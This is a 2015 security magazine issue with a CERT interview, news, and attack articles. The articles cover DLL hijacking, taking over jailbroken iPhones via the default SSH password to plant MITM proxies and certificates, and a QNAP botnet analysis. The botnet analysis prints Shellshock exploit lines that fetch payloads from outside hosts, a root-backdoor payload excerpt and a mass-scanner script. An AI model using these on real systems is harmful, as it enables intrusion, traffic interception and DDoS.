security kaizen magazine, issue 18



DESCRIPTION

The Security Kaizen Magazine provides important information on industry advancements and professional development to those involved in the cyber security domain, who in turn educate their partners about issues and trends in the industry. Issue 19 includes an interview with Badar Ali Al Salehi, DLL Hijacking, Attacking Jailbroken iDevices, Security News, NAS Botnet Revealed, malware analysis and others.


Page 1: Security Kaizen Magazine, Issue 18

Vol.5 Issue 18 Jan. - Feb. 2015

2015: The Best Is Yet To Come

Cairo Security Camp 2014: 5 Years of Success

Interview with Badar Ali Al Salehi, General Director at OMAN National CERT

www.bluekaizen.org

Regional Cyber Security Summit 2015
Towards the Future of Cyber Attacks
March 29-30, 2015, Al Bustan Palace, Muscat, Oman

Confirmed Speakers:
• Eng. Badar Al Salehi, Director General, Oman National CERT, Head of ITU Regional Cyber Security Center
• Maarten Van Horenbeeck, President at FIRST
• Omar Sherin, Head of CIIP-Qcert
• Georgia Weidman, Bulb Security LLC Founder

Contents

Interviews
• Interview with Mr. Badar Ali Al Salehi, General Director, OMAN National CERT, Information Technology Authority (ITA) ... 5

Grey Hat
• DLL Hijacking ... 7
• Attacking Jailbroken iDevices ... 10
• NAS Botnet Revealed ... 13

New & News
• Bluekaizen News ... 16
• Regional Cyber Security Summit 2015 ... 19
• Cairo Security Camp 2014 ... 20

Reviews
• AndroidOS_GEINIMI analysis report (Malware Review) ... 24
• Win32:DarkSeoul-C, Trojan.Win32.EraseMBR.b (Malware Review) ... 28
• Manual Source Code Review (Code Review) ... 31

Best Practice
• Defining a Proactive Security Monitoring Strategy ... 37
• Information Security Is a Challenge in The Middle East ... 39


Editor's Note

It is customary with each New Year that everyone sets his plans and his resolutions with the mere hope of improvement, or better yet a new beginning. Usually we are filled with positive feelings and an inner boost that keeps us going till the year's end.

I will try to enter this year with a more enthusiastic approach (though it will be hard); I will try not to set the bar too high this time, and for this I have to thank everyone who helped me with their words and encouragement, everyone I see fighting and still standing in his area, young geeks with their never-ending ideas, and the list goes on... I guess what I am trying to say is, you should all take this as an opportunity to see new possibilities, to see the glass half full, to join a group of positive people and not let the negative vibes get you. This March, Bluekaizen is contributing to organizing the Regional Cyber Security Summit in Oman with the help of Oman CERT.

On a different note, I want to congratulate Ahmed Mohamed for the Hack Zone project and hope you can all support him to let his dream come to life. Those kinds of initiatives keep the positive energy in us.

Also, we are now preparing for the interviews of Bluekaizen Chapters, so if you are interested please fill out the form that should have been published on the Bluekaizen Facebook page. This year we are planning to establish more solid and organized chapters with clear duties and responsibilities so that we can reach as many people as we can. #spreadtheword #Bluekaizenchapters 2015

Moataz Salah
Bluekaizen Founder

Magazine Team
Chairman & Editor-in-Chief: Moataz Salah
Editor: Mohamed H. Abdel Akher
Contributors: BK team, Khaled Sakr, Nipun Jaswal, Senad Aruc, Ehab Abdel Monem, Abdulrahman Hesham, Shaikh Rashid, Harris D. Schwartz, Abdul Rehman
Website Development: Mariam Samy
Marketing Coordinator: Mahitab Ahmed
Distribution: Ahmed Mohamed
Design: Mohamed A. El-Maghraby

For advertisement in Security Kaizen Magazine and the www.bluekaizen.org website: [email protected], or phone: +2 0100 267 5570, +971 5695 40127

Security Kaizen is issued bi-monthly. Reproduction in whole or in part without written permission is strictly prohibited. All copyrights are preserved to www.bluekaizen.org.

Interviews

Interview with Mr. Badar Ali Al Salehi, General Director, OMAN National CERT, Information Technology Authority (ITA)

Can you please introduce yourself to security Kaizen magazine readers (BIO, Experience)?


My name is Badar Al-Salehi. I am the General Director of Oman National CERT, which is the e-Oman national initiative aiming at addressing cyber security risks, developing local cyber security capabilities within the Sultanate of Oman, building a cyber security awareness program for public and private sector organizations, and securing critical national infrastructure and key industries, along with the general public and ICT users.

I joined ITA at the early establishment of this Authority in 2006 and since then I have been working on different national information security and critical infrastructure related projects. I am also a member of different regional and international forums and committees, including the GCC CERT and OIC-CERT steering committees, and I am the Oman CERT representative to the Forum of Incident Response and Security Teams (FIRST). I am an advisory board member at the College of Modern Science and a member of the Ministry of Manpower committee reviewing the IT curriculum. I have been speaking and panelling at several regional and international ICT and cyber security forums, summits and conferences. Before joining ITA, I also held different senior roles at Sultan Qaboos University and the Municipality of Muscat, looking after critical infrastructures and systems as well as information security, where I worked on the first initiative in Oman to establish an information security management system within the government.

BK Team


What is the Regional Cyber Security Center? How was it established? And what are its vision and mission?

Towards achieving its goal of a safe cyberspace across the globe, the ITU Arab Regional Cyber Security Center (ITU-ARCC) was established by the International Telecommunication Union (ITU) and the Omani Government, represented by the Information Technology Authority, through its collaboration with the International Multilateral Partnership Against Cyber Threats (IMPACT), with a vision of creating a safer and cooperative cybersecurity environment in the Arab Region and strengthening the role of ITU in building confidence and security in the use of information and communication technologies in the region.

In line with the objectives of the ITU Global Cybersecurity Agenda (GCA) and the ITU-IMPACT initiative, ITU-ARCC acts as ITU's cybersecurity hub in the region, localizing and coordinating cybersecurity initiatives. ITU-ARCC is hosted, managed and operated by Oman National CERT (OCERT). The Centre is designed to cater for the cybersecurity needs of the Arab Region. It was officially launched on the 3rd of March 2013 at the Oman National CERT in Muscat.

What are the main services provided by ARCC?

ITU-ARCC offers a variety of cybersecurity services to meet the difficult challenges of fighting cyber threats and to support the center's aim. These services align with the ITU Global Cybersecurity Agenda (GCA), which intends to enhance confidence and security in the information society. The GCA was launched on 17th May 2007 for international cooperation and strategies to improve the global cybersecurity posture. ITU-ARCC provides the following services:

• Cybersecurity Strategy and Governance
• Cybersecurity Assurance & Compliance
• Cybersecurity Capacity Building
• Emergency Incident Response
• Technical Services and Information Sharing: full collaboration and sharing of information against cyber threats

What do you think was the greatest achievement of ARCC in 2014?

In the coming years ITU-ARCC will focus on designing and implementing national cybersecurity strategies for Arab countries to achieve a significant improvement in their security posture. In addition, ITU-ARCC will conduct and implement cybersecurity measures in the region.

What are your wishes for the Arab region in the information security field?

The main purpose of ITU-ARCC is to support the member states of the Arab Region in developing and improving cybersecurity through the development of sound cybersecurity policies and capabilities, building human capacity, and developing related tools, applications, templates, procedures and manuals. ITU-ARCC wishes to unite and strengthen cybersecurity initiatives and programs to improve the cybersecurity posture in the Arab region against cyber threats through regional cooperation.

What is the main role of Oman CERT?

OCERT's mission is to develop cyber-security capabilities to increase the capacity for security incident detection and emergency response to such incidents, and also to ensure cyber-security awareness in public and private sector organizations, including citizens and residents.

Can you give us more information about the Regional Cyber Security Summit 2015?

The Information Technology Authority, represented by Oman National CERT (OCERT), is hosting the Regional Cyber Security Summit in cooperation with the International Telecommunication Union (ITU), IMPACT and Bluekaizen on the 29th and 30th of March in Muscat, Oman.

The Regional Cyber Security Summit in 2015 focuses on future expected threats and measures, and also aims at connecting the public, private and academic sectors with the main purpose of providing an appropriate platform for up to 200 senior ICT and cyber security officials from the MENA region to discuss and formulate strategic directions and plans to tackle emerging threats to the global and regional security sector. The conference is targeting the different CERTs in the Arab region, Chief Security Officers and strategic positions in different organizations, either from Oman or other Arab countries. Security professionals from all over the world are welcome to submit their talks before the 20th of February if they are interested in presenting at the fourth edition of RCSS. For more information you can check the summit website:

www.regionalcybersecuritysummit.com

Grey Hat

DLL Hijacking

Khaled Sakr, Information Security Engineer at Security Meter

Introduction

In this article I would like to discuss the DLL Hijacking attack, because of its impact and ease of exploitation. We will go through the concept of DLL Hijacking, then how systems are exploited using DLL hijacking in simple steps, and finally a demo of exploiting a vulnerable program.

DLL & DLL Hijacking

Let's first understand what a DLL is and what it is used for. DLL is an abbreviation for Dynamic Link Library. DLLs are libraries that contain shared functions used by executable files at runtime. As an example, take an application that displays a MessageBox saying "Simple MessageBox": what actually happens inside this application is that it loads a built-in DLL called "User32.dll" and executes a function from that DLL called MessageBoxA, e.g. MessageBoxA(NULL, "Simple MessageBox", NULL, MB_OK); (see Figure below).


The flow that the application takes to load a DLL at runtime is as follows: first Windows tries to locate the DLL; to achieve this it searches a well-defined set of directories in a particular order, as described in the DLL Search Order. Based on that logic, if an attacker gains control of one of the directories on the DLL search path, he can place a malicious copy of the DLL in that directory. This is called DLL Hijacking: if the application does not find the legitimate DLL before searching the compromised directory, it will load the malicious DLL. In this way DLL Hijacking can be used to perform remote code execution, or even privilege escalation if the vulnerable program runs as administrator.

DLL Hijacking in a few steps

So what are the steps to perform a successful DLL hijacking attack?
1. Target a certain application.
2. Monitor the DLLs that are loaded by this application.
3. Find the search order for the DLLs.
4. Target a DLL where you can put your malicious DLL so that it runs before the legitimate DLL, or better, target an unavailable DLL, for example VulnDLL.dll.
5. Find out which function this DLL is executing, for example executeme().
6. Write the code you want to be executed when the DLL loads and put it inside a function executeme().
7. Compile the code to a shared library and name it VulnDLL.dll.

Let's Crack Some Systems

In this part I'll show a demo of how to perform a successful DLL Hijacking attack. In this demo we will target the tftp32.exe application. You can find a list of applications reported to be vulnerable to DLL Hijacking at the following link: http://www.exploit-db.com/dll-hijacking-vulnerable-applications/ So let's start the fun part!

As discussed, we need to get the list of DLLs that get loaded at runtime when the application starts. This can be achieved easily using the Procmon.exe tool: just start your application and add the following filters in Procmon:

• Process Name is tftp32.exe
• Path ends with DLL

These filters will give us all entries related to the process tftp32.exe and all the DLL files it is trying to load. Now let's target a DLL. We can notice in the Result column in Procmon that there are entries that state "NAME NOT FOUND", which means that the system is trying to load the DLL but cannot find it, so these are the perfect DLLs to target. So let's add another filter:

• Result contains NAME NOT FOUND

Great, now we have a smaller list of targets to choose from. Any one of these DLLs can be vulnerable to DLL Hijacking, so let's pick one, for example "IPHLPAPI.DLL".

As discussed, the application loads the DLL to execute a function existing inside it, so the next step is to figure out which function inside this DLL the application needs. With a little bit of reversing using IDA we can obtain this information. I was able to get the function name using static reversing only; in other cases you will need to reverse the application at runtime to obtain the function name. Now let's start reversing.


In the case of this application it is very trivial: just load the application in IDA.
• Open the "Strings" subview and search for the target DLL, IPHLPAPI.DLL (see Figure below).
• Double-click on it so it gives you a reference to where it is used in the assembly code (see Figure below).

We can see that a string was defined with the value "IPHLPAPI.DLL" (db 'IPHLPAPI.DLL'). We can see where this string value is used in the code if we double-click on DATA XREF: .rdata:004283EC (see figure below).

At the address where the target DLL is referenced we can find that it imports a function called SendARP(). We don't need to know what this function does, we only need to know its name.

So, as you have all guessed by now, the only steps remaining are:
• Write the code we want to get executed when the vulnerable application runs.
• Insert this code inside a function called SendARP().
• Compile this code into a shared library (DLL) and call it IPHLPAPI.DLL.
• Place it in a path where the system looks for it, and we get ourselves a backdoor or remote code execution on the system.

Just to demonstrate, I will write code that opens a MessageBox displaying "DLL Hijacked" to the user; below is a code snippet.

A simple explanation of the code: when the DLL is attached (DLL_PROCESS_ATTACH), the SendARP() function is executed. So each time the program runs, this function will get executed. Instead of just opening a message box, this vulnerability can be used to make the victim reverse-connect to you and get a permanent shell or backdoor on the box, or even a Meterpreter session, if the right code is inserted inside the SendARP() function.

Summary

So now we know how to exploit DLL hijacking vulnerabilities; what about remediating them? In a few points, here are some recommended solutions.

From a development perspective:
1. Always use a fully specified path name in the C functions LoadLibrary() or LoadLibraryEx().
2. Consider removing the current directory from the standard search path by calling the C function SetDllDirectory with an empty string ("").

From a system hardening perspective:
3. Make sure the registry value SafeDllSearchMode is set to 1; this places the user's current directory later in the search order (HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode).

As a matter of fact, the above is not really a complete solution, as Microsoft has a feature called "DLL Local Redirection": if an application is named abc.exe and you create a folder called "abc.exe.local", this forces the application to search for all the DLLs it needs in this local folder first, even if the DLL was specified with a full path using LoadLibraryEx("Path to DLL"). So if you think about it, this can make all applications vulnerable to DLL hijacking attacks.
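To make the SafeDllSearchMode point concrete, the following Python script (an added example, not the author's code) models the two search orders and reports, for each DLL an application requests, which user-writable directories are probed before the real file is found. The application directory, current directory, PATH entry and file-system contents are constructed; KnownDLLs, manifests and .local redirection are not modelled.

```python
"""Audit of the Windows DLL search order discussed in the article.

Added example, not code from the article.  The application path, the
current directory, the PATH entry and the file-system contents below are
constructed; the two search orders follow Microsoft's documented behaviour
for SafeDllSearchMode = 1 (default) and SafeDllSearchMode = 0.  KnownDLLs,
manifests and .local redirection are deliberately left out of the model.
"""
from typing import Dict, List, Optional, Set, Tuple

SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows"]


def search_order(app_dir: str, cwd: str, path_dirs: List[str], safe_mode: bool) -> List[str]:
    """Directories consulted, in order, for a DLL requested by bare name."""
    if safe_mode:
        # SafeDllSearchMode=1: the current directory drops behind the system directories.
        order = [app_dir, *SYSTEM_DIRS, cwd]
    else:
        # SafeDllSearchMode=0: the current directory is searched right after the app dir.
        order = [app_dir, cwd, *SYSTEM_DIRS]
    return order + list(path_dirs)


def resolve(dll: str, order: List[str], fs: Dict[str, Set[str]]) -> Tuple[Optional[str], List[str]]:
    """Return (directory the DLL loads from or None, directories probed before the hit).

    Mirrors what Procmon shows: every directory before the hit is a
    'NAME NOT FOUND' probe; None means the name was not found anywhere.
    """
    name = dll.lower()
    probed: List[str] = []
    for directory in order:
        if name in {f.lower() for f in fs.get(directory, set())}:
            return directory, probed
        probed.append(directory)
    return None, probed


def audit(dlls, app_dir, cwd, path_dirs, fs, writable, safe_mode):
    """Per DLL: (resolving directory, user-writable directories consulted at or before it).

    A non-empty list is a hijack window: a file dropped there is loaded in
    place of the real DLL, or in place of nothing when the name is missing.
    """
    order = search_order(app_dir, cwd, path_dirs, safe_mode)
    report: Dict[str, Tuple[Optional[str], List[str]]] = {}
    for dll in dlls:
        hit, probed = resolve(dll, order, fs)
        exposed = [d for d in probed if d in writable]
        if hit is not None and hit in writable:
            exposed.append(hit)
        report[dll] = (hit, exposed)
    return report


# Constructed environment mirroring the article's tftpd32 walk-through.
APP_DIR = r"C:\Program Files\Tftpd32"      # not writable by a standard user
CWD = r"C:\Users\alice\Downloads"          # user-writable
PATH_DIRS = [r"C:\Users\alice\Tools"]      # user-writable PATH entry
WRITABLE = {CWD, PATH_DIRS[0]}
FS: Dict[str, Set[str]] = {
    APP_DIR: {"tftpd32.exe"},
    r"C:\Windows\System32": {"kernel32.dll", "user32.dll"},
    # IPHLPAPI.DLL deliberately absent: the 'NAME NOT FOUND' case from the article.
}
REQUESTED = ["user32.dll", "IPHLPAPI.DLL"]


def run(safe_mode: bool):
    """Audit the constructed environment under the given SafeDllSearchMode setting."""
    return audit(REQUESTED, APP_DIR, CWD, PATH_DIRS, FS, WRITABLE, safe_mode)


if __name__ == "__main__":
    for mode in (True, False):
        print(f"SafeDllSearchMode={int(mode)}")
        for dll, (hit, exposed) in run(mode).items():
            print(f"  {dll:14} -> {hit or 'NAME NOT FOUND':28} hijackable via: {exposed or 'none'}")
```

With SafeDllSearchMode on, user32.dll is found in System32 before any writable directory is consulted; with it off, the current directory is probed first, and a DLL that is missing everywhere exposes every writable directory on the path in both modes.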

Grey Hat

Attacking Jailbroken iDevices

Nipun Jaswal, Chief Cyber Security Architect

Introduction

Apple iDevices are continually jailbroken in order to expand their capabilities. However, most people do not know the consequences that come alongside. Hackers and security enthusiasts can easily breach a jailbroken device and install malicious proxies remotely on the victimized device. Today we will be discussing the same procedure that hackers use to leverage their attacks onto the target device, and we will look at the possible patch for the same vulnerability.


Requirements

In order to carry out this attack efficiently, a hacker would require the following tools:
• Burp Suite (for certificate generation)
• WinSCP client (copying and downloading files from the remote device)
• Hydra (brute force for SSH)
• PList Editor (editing PList files)
• PuTTY (terminal for the remote device)

Procedure

Most people who possess jailbroken iDevices do not know about the open SSH port of the device. Hence, this makes them vulnerable to a known-password attack, since in most cases the default password 'alpine' is still in use. However, if the user is a little techy and has chosen to change the default password, Hydra, a brute force tool, can help find the correct password of the device. After logging in through SSH using PuTTY, we can fetch the preferences file of the device located at the following path:

/private/var/preferences/SystemConfiguration/preferences.plist

Using the WinSCP client, we can download the above file to our system and view its contents using the PList Editor software.

Figure 1 No Proxy Details

Figure 2 Proxy Configuration

We can see that we have:
• HTTPEnable=0
• HTTPProxyType=0
• HTTPSEnable=0

If we alter these three values, we can set the proxy configuration on the device automatically. If we set HTTPProxyType to 1 it will use the proxy details as type 'HTTP', and if we set it to 2 it will use the proxy details as type 'SOCKS'. Let us modify this configuration file.

Altering the above values will result in the following proxy configuration of the device:

Figure 3 Automatic Proxy Configuration
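A defender-side check for the proxy keys discussed above, as an added Python example rather than anything from the article: it parses a preferences.plist with plistlib and reports any network service whose HTTP or HTTPS proxy has been switched on. The plist excerpt is constructed, and the placement of the keys under a per-service "Proxies" dictionary is an assumption.

```python
"""Check a device's preferences.plist for proxy settings that were switched on.

Added example, not the article's code.  The keys HTTPEnable, HTTPSEnable and
HTTPProxyType are the ones the article names; that they live under a
network-service 'Proxies' dictionary is an assumption.  The plist below is
constructed and reproduces the manipulated state the article describes.
"""
import plistlib
from typing import Any, Dict, List

# Constructed excerpt of /private/var/preferences/SystemConfiguration/preferences.plist
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>NetworkServices</key><dict>
    <key>SERVICE-UUID-EXAMPLE</key><dict>
      <key>Proxies</key><dict>
        <key>HTTPEnable</key><integer>1</integer>
        <key>HTTPProxy</key><string>192.0.2.10</string>
        <key>HTTPPort</key><integer>8080</integer>
        <key>HTTPSEnable</key><integer>1</integer>
        <key>HTTPSProxy</key><string>192.0.2.10</string>
        <key>HTTPSPort</key><integer>8080</integer>
        <key>HTTPProxyType</key><integer>1</integer>
      </dict>
    </dict>
  </dict>
</dict></plist>"""

PROXY_SWITCHES = ("HTTPEnable", "HTTPSEnable", "HTTPProxyType")
PROXY_TYPES = {0: "none", 1: "HTTP", 2: "SOCKS"}   # values as given in the article


def find_proxies(node: Any, path: str = "") -> List[Dict[str, Any]]:
    """Walk the plist tree and collect every dictionary that carries a proxy switch."""
    hits: List[Dict[str, Any]] = []
    if isinstance(node, dict):
        if any(k in node for k in PROXY_SWITCHES):
            hits.append({"path": path, **node})
        for key, value in node.items():
            hits.extend(find_proxies(value, f"{path}/{key}"))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            hits.extend(find_proxies(value, f"{path}[{i}]"))
    return hits


def proxy_findings(plist_bytes: bytes) -> List[str]:
    """Human-readable findings; an empty list means no proxy is switched on."""
    findings: List[str] = []
    for proxies in find_proxies(plistlib.loads(plist_bytes)):
        for scheme in ("HTTP", "HTTPS"):
            if proxies.get(f"{scheme}Enable", 0):
                host = proxies.get(f"{scheme}Proxy", "?")
                port = proxies.get(f"{scheme}Port", "?")
                findings.append(f"{proxies['path']}: {scheme} proxy enabled -> {host}:{port}")
        ptype = proxies.get("HTTPProxyType", 0)
        if ptype:
            label = PROXY_TYPES.get(ptype, "unknown")
            findings.append(f"{proxies['path']}: HTTPProxyType={ptype} ({label})")
    return findings


if __name__ == "__main__":
    for line in proxy_findings(SAMPLE_PLIST) or ["no proxy configured"]:
        print(line)
```

Run against a freshly jailbroken device the script should print nothing; the three findings it prints for the constructed plist are exactly the state the article produces by editing the file.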

Hence, we can see the proxy details showing up in the manual configuration of the device.

Installing the certificate on the device

Wait; to read the HTTPS/SSL-protected data of applications like Twitter, Gmail and Facebook, we need to install the root CA certificate on the device as well. The certificate details are present at the following path:

/private/var/mobile/Library/ConfigurationProfiles

Let us see what files are contained in this directory before certificate installation.

Figure 4 Device before Certificate Install

In addition, the interface does not contain any option for profiles before they are installed.

Figure 5 Device Properties Before Cert Install

Now what we can easily do is install the certificate on our own iDevice using Burp Suite and copy its files to the target device. We need four files from /private/var/mobile/Library/ConfigurationProfiles:
• Cert
• PayloadDependency.plist
• PayloadManifest.plist
• ProfileTruth.plist

Let us replace these files with the ones from our device as follows.

Figure 6 Device After Copying Cert Files

Next, we can respring the device and see whether the certificate is installed.

Figure 7 Device properties after Cert Install

We can see that the profile is now part of the general properties of the device. Hence, we configured an MITM proxy remotely and installed the certificate too. Therefore, we can easily capture the device's SSL traffic and analyze it for vital pieces of information.

References
http://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/
http://www.putty.org
http://winscp.net/eng/download.php
http://plist-editor-for-windows.software.informer.com/
http://portswigger.net/Burp/help/proxy_options_installingCAcert.html

Grey Hat

NAS Botnet Revealed

Senad Aruc, Senior Lead at Security Operations

About the security researcher

Multiple-certified ISMS professional with a 10-year background in IT security, IDS and IPS, SIEM, SOC, network forensics, malware analysis, ISMS and risk, ethical hacking, vulnerability management, anti-fraud and cyber security. Skills include written and verbal communication in 6 different languages. Currently holding a Senior Security Specialist position at Reply S.p.A. - Communication Valley - Security Operations Center, responsible for advanced security operations.

We present findings in addition to the work in the following analyses:

Worm Backdoors and Secures QNAP Network Storage Devices
https://isc.sans.edu/forums/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061

Shellshock Worm Exploiting Unpatched QNAP NAS Devices
https://threatpost.com/shellshock-worm-exploiting-unpatched-qnap-nas-devices/109870

A little ShellShock fun
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html


This is what we found: the missing pieces from previous research.

The attackers are sending a GET request carrying the Shellshock exploit to IP ranges across the whole Internet. The successfully hacked NAS devices are forced to download a payload from the Internet; this payload is an SH script with very clever design logic, specially built for QNAP NAS devices. The payload downloads an ELF Linux installer package with bot functionality for DDoS. From this point the attacker builds persistence with an autorun.sh script inside the compromised NAS device.

Another interesting finding is that the attacker patches the vulnerable device against the Shellshock vulnerability; by doing this the attacker prevents other hackers from owning the already hacked NAS device.

Adding a "request" user with root privileges to the "passwd" and "shadow" files is a classical approach to owning a Linux machine. The real aim of this massive hack is the script "armgH.cgi" that the attacker downloads and installs on the compromised machine.

This CGI backdoor prepares the NAS to become an armed device ready for DDoS. The whole attack schematic is designed to be continuous, in auto-pilot mode. So far we have managed to detect more than 500 compromised devices.

Attack flow: Massive Attack > Deploying Payload > Patching against Shellshock (persistence) > Arming > Deploy the scanner

Details

Attack exploit detected by our IDS devices:

    GET /cgi-bin/authLogin.cgi HTTP/1.1
    Host: 127.0.0.1
    User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://xxx.14.xx.xx/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1

Response:

    HTTP/1.1 404 Not Found
    Content-Type: text/html;charset=utf-8
    Content-Length: 2250
    Date: Sat, 13 Dec 2014 22:09:42 GMT
    Server: ...
    HTTP Status 404 - /cgi-bin/authLogin.cgi

Payload (S0.sh), hosted on a compromised server (excerpt):

    #!/bin/sh
    export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin
    unset HISTFIE ; unset REMOTEHOST ; unset SHISTORY ; unset BASHISTORY
    os=`uname -m`
    ip=xxx.14.xx.xx
    #wget -P /tmp/ http://qupn.byethost5.com/gH/S0.sh ; cd /tmp/ ; chmod +x S0.sh ; sh S0.sh
    #
    #
    fold=/share/MD0_DATA/optware/.xpl/
    if [[ "$os" == 'armv5tel' ]]; then
        wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi
        chmod 4755 /home/httpd/cgi-bin/armgH.cgi
        mv /home/httpd/cgi-bin/armgH.cgi /home/httpd/cgi-bin/exo.cgi
        cp /home/httpd/cgi-bin/exo.cgi ${fold}.exo.cgi
        sleep 1
    ...

    Search="request"
    Files="/etc/passwd"
    if grep $Search $Files; then
        echo "$Search user its just added!"
    else
        echo "request:x:0:0:request:/share/homes/admin:/bin/sh" >> /etc/passwd
        echo 'request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7:::' >> /etc/shadow
    ...

    #inst patch
    wget -P /mnt/HDA_ROOT/update_pkg/ http://eu1.qnap.com/Storage/Qfix/ShellshockFix_1.0.2_20141008_all.bin
    ...

    #inst scan
    sfolder="/share/HDB_DATA/.../"
    url69="http://xxx.14.xx.79/run"


Arming the NAS devices for DDoS attacks. Hosted on the compromised server: "armgH.cgi", an ELF Linux backdoor with an IRC client and DDoS capability. Output from the reverse engineering analysis (each line is a format string the bot sends to its channel as PRIVMSG %s :* ...):

    .exec <commands> - execute a system command
    .version - show the current version of bot
    .status - show the status of bot
    .help - show this help message
    *** Scan Commands
    .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you
    .advscan <a> <b> - scan with d-link config reset bug
    .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random
    .advscan->recursive - scan local ip range with d-link config reset bug
    .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random
    .advscan->random - scan random ip range with d-link config reset bug
    .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random
    .advscan->random->b - scan local ip range with d-link config reset bug
    .stop - stop current operation (scan/dos)
    *** DDos Commands:
    NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
    use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
    where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
    .spoof <ip> - set the source address ip spoof
    .synflood <host> <port> <secs> - tcp syn flooder
    .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
    .ackflood <host> <port> <secs> - tcp ack flooder
    .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
    *** IRC Commands:
    .setchan <channel> - set new master channel
    .join <channel> <password> - join bot in selected room
    .part <channel> - part bot from selected room
    .quit - kill the current process

Screenshot from a hacked NAS device: the deployed payload can be controlled via the CGI web backdoor at http://X.X.X.X:8080/cgi-bin/exo.cgi

Mass scanner for Shellshock

This script was taken from a compromised NAS device. The attacker uses the "pnscan" multi-threaded port scanner to search for and hack other vulnerable QNAP NAS devices.

    #!/bin/sh
    ## xXx@code 3-12-2014
    rand=`echo $((RANDOM%255+2))`
    #url=""
    url="http://1xx.xx.xx.xx/S0.sh"
    download="/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c $url -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 \n\n\n"
    get="GET /cgi-bin/authLogin.cgi HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: () { :; }; $download \n\n\n"
    ./pnscan -rQDoc -w"$get "-t500 -n300 $rand.0.0.0:255.0.0.0 8080 > /dev/null &
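Detection logic for the two indicators this write-up describes, as an added Python example (not the researcher's code): the Shellshock function-definition prefix in any HTTP header, and a UID-0 account in /etc/passwd that the device is not expected to have. The request samples, the passwd excerpt, the placeholder address 198.51.100.7 and the list of expected UID-0 accounts are constructed.

```python
"""Detection for the two indicators in the NAS botnet write-up.

Added example, not the researcher's code.  The request samples, the passwd
excerpt, the placeholder address 198.51.100.7 and the set of accounts that
are expected to hold UID 0 on the device are all constructed.
"""
import re
from typing import Dict, List

# Bash function-definition prefix that Shellshock (CVE-2014-6271) turns into
# code execution when a header is copied into a CGI environment variable.
SHELLSHOCK = re.compile(r"\(\s*\)\s*\{\s*:;\s*\}\s*;")

# Constructed raw HTTP requests; the first has the shape of the one the IDS caught.
REQUESTS = [
    "GET /cgi-bin/authLogin.cgi HTTP/1.1\r\nHost: 127.0.0.1\r\n"
    "User-Agent: () { :; }; /usr/bin/wget -c http://198.51.100.7/S0.sh -P /tmp\r\n\r\n",
    "GET /cgi-bin/authLogin.cgi HTTP/1.1\r\nHost: nas.example\r\n"
    "User-Agent: Mozilla/5.0 (compatible)\r\n\r\n",
    # Same prefix smuggled through a header other than User-Agent.
    "GET /index.html HTTP/1.1\r\nHost: nas.example\r\nCookie: () { :; }; echo test\r\n\r\n",
]


def shellshock_headers(raw_request: str) -> Dict[str, str]:
    """Return {header: value} for every header in the request carrying the prefix."""
    hits: Dict[str, str] = {}
    for line in raw_request.split("\r\n")[1:]:   # skip the request line
        if ":" not in line:
            continue                               # blank separator or body
        name, value = line.split(":", 1)
        if SHELLSHOCK.search(value):
            hits[name.strip()] = value.strip()
    return hits


def flagged_requests(requests: List[str]) -> List[int]:
    """Indexes of the requests that would raise an alert."""
    return [i for i, req in enumerate(requests) if shellshock_headers(req)]


# Constructed /etc/passwd excerpt.  'admin' is assumed to be the device's own
# UID-0 account; 'request' is the line the payload appends.
PASSWD = """admin:x:0:0:administrator:/share/homes/admin:/bin/sh
guest:x:65534:65534:guest:/tmp:/bin/sh
httpdusr:x:99:99::/home/httpd:/bin/sh
request:x:0:0:request:/share/homes/admin:/bin/sh
"""


def rogue_uid0(passwd_text: str, expected=("admin",)) -> List[str]:
    """UID-0 accounts that are not in the expected set for this device."""
    rogue: List[str] = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[2] == "0" and fields[0] not in expected:
            rogue.append(fields[0])
    return rogue


if __name__ == "__main__":
    for i in flagged_requests(REQUESTS):
        print(f"request {i}: Shellshock prefix in {shellshock_headers(REQUESTS[i])}")
    print("unexpected UID-0 accounts:", rogue_uid0(PASSWD))
```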

New & News

A peek under the hood at the recent security breaches

ICANN has been hacked

The Internet Corporation for Assigned Names and Numbers has been hacked by unknown attackers, which allowed them to access some of the organization's systems, ICANN said.

Spoofed emails pretending to be internal ICANN communications were sent to its staff members. The link in the emails took the staff to a bogus login page, where they provided their usernames and passwords, the keys to their work email accounts.

"We believe a 'spear phishing' attack was initiated in late November 2014," Tuesday's press release stated. "It involved email messages that were crafted to appear to come from our own domain being sent to members of our staff. The attack resulted in the compromise of the email credentials of several ICANN staff members."

According to ICANN, the hackers were able to successfully access a number of systems within ICANN, including the Centralized Zone Data System (CZDS), the wiki pages of the ICANN Governmental Advisory Committee (GAC), the domain registration Whois portal, and the ICANN blog.

"Based on our investigation to date, we are not aware of any other systems that have been compromised, and we have confirmed that this attack does not impact any IANA-related systems," ICANN stated.

BK Team


